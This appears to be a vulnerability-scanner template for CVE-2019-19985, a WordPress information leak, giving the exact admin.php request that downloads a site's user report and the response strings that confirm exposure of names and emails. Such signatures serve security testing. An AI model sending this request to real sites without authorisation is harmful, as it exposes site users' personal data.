id: wordpress-infoleak
info:
  name: Wordpress Infoleak (CVE-2019-19985)
  risk: Medium
  confidence: Certain

params:
  - root: '{{.BaseURL}}'

replicate:
  prefixes: 'blog, news, docs'

variables:
  - vul: |
      wp-admin/admin.php?page=download_report&report=users&status=all

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/{{.vul}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'Name,Email,Status,Created') && StringSearch("resHeaders", 'Content-Disposition')
